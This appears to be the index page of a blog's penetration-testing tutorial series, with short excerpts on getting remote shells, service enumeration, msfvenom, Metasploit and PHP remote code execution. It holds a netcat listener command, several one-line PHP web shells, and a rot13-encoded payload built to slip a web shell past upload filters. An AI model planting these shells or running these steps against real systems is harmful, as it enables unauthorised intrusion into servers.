IT Systems, Networks, Security and Education
Getting a Remote Shell Let’s assume you’ve found some sort of access to your target, ideally an upload vulnerability that will let you get some shellcode onto the target. Netcat You could just start a Netcat listener on the victim, if Netcat is available: nc -lvnp 1234 … and start a shell on the attack …
Continue reading “[ Pen Testing ] :: Step by Step: Uploading Shellcode and Upgrading the Shell”
SSH Enumeration shellshock bruteforce user_enum Debian OpenSSL Predictable PRNG
SMB Enumeration nmap –script vuln nmap –script smb* nmap –script smb-enum-shares,smb-ls enum4linux, linenum, etc. smbclient smbcontrol smbmap smbpasswd etc
Database Enumeration Enumeration With SQLmap SQLmap is noisy as hell. Here is the official options/examples page: https://github.com/sqlmapproject/sqlmap/wiki/Usage. For example, save a captured header as an input file for SQLmap: Load HTTP request from a file Option: -r One of the possibilities of sqlmap is loading of raw HTTP request from a textual file. That way …
Continue reading “[ Pen Testing ] :: Step by Step: Database Enumeration”
SNMP Enumeration snmpcheck snmpenum (More to come.)
Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Local Linux Enumeration & Privilege Escalation Cheatsheet: an item-by-item list of tests performed by LinEnum: https://www.rebootuser.com/?p=1623 LinEnum: https://github.com/rebootuser/LinEnum
Msfvenom creates shellcode from within Bash. Here is Rapid7’s own excellent documentation: https://github.com/rapid7/metasploit-fraamework/wiki/How-to-use-msfvenom “Complete How to Guide for MSFvenom”: https://securitytraning.com/complete-guide-msfvenom/ And a good thorough walk-through (in Spanish, but with regular English command examples): https://www.hackplayers.com/2018/05/recopilacion-shells-en-windows.html Open Bash and enter: msfvenom to get a syntax page. View a list of payloads: msfvenom -l payloads Create the reverse …
Continue reading “[ Pen Testing ] :: Step by Step: msfvenom”
Remote Code Execution RCE PHP RCE Test a form for vulnerability to PHP RCE: <?php phpinfo(); ?> Get a remote PHP shell: <?php system($_GET[“c”]); ?> <?php `$_GET[“c”]`; ?> Upload a file: <?php file_put_contents(‘/var/www/html/uploads/test.php’, ‘<?php system($_GET[“c”]);?>’); ?> Evade file-type upload filters using rot13 + urlencode: <?php $payload=”%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E”; file_put_contents(‘/var/www/html/uploads/testfile.php’, str_rot13(urldecode($payload))); ?> RCE via webshell Pentest Monkey has …
Continue reading “[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)”
Burp Suite Start with the basics: https://www.cybrary.it/s3ss10n/s3ss10n-wednesday-burp-suite-basics/ Use Burp to Test for Path Traversal Vulnerabilities https://support.portswigger.net/customer/en/portal/articles/2590663-using-burp-to-test-for-path-traversal-vulnerabilities
Metasploit and Armitage Starting Metasploit Generic Metasploit installation instructions for any OS: https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework Instructions for starting Metasploit in Kali: https://docs.kali.org/general-use/starting-metasploit-framework-in-kali The default install of Metasploit that comes with Kali needs to be initialized. service postgresql start msfdb init # only if necessary Starting msfconsole msfconsole Once msfconsole is running: msf>db_status # check database status # …
Continue reading “[ Pen Testing ] :: Step by Step: Metasploit and Armitage”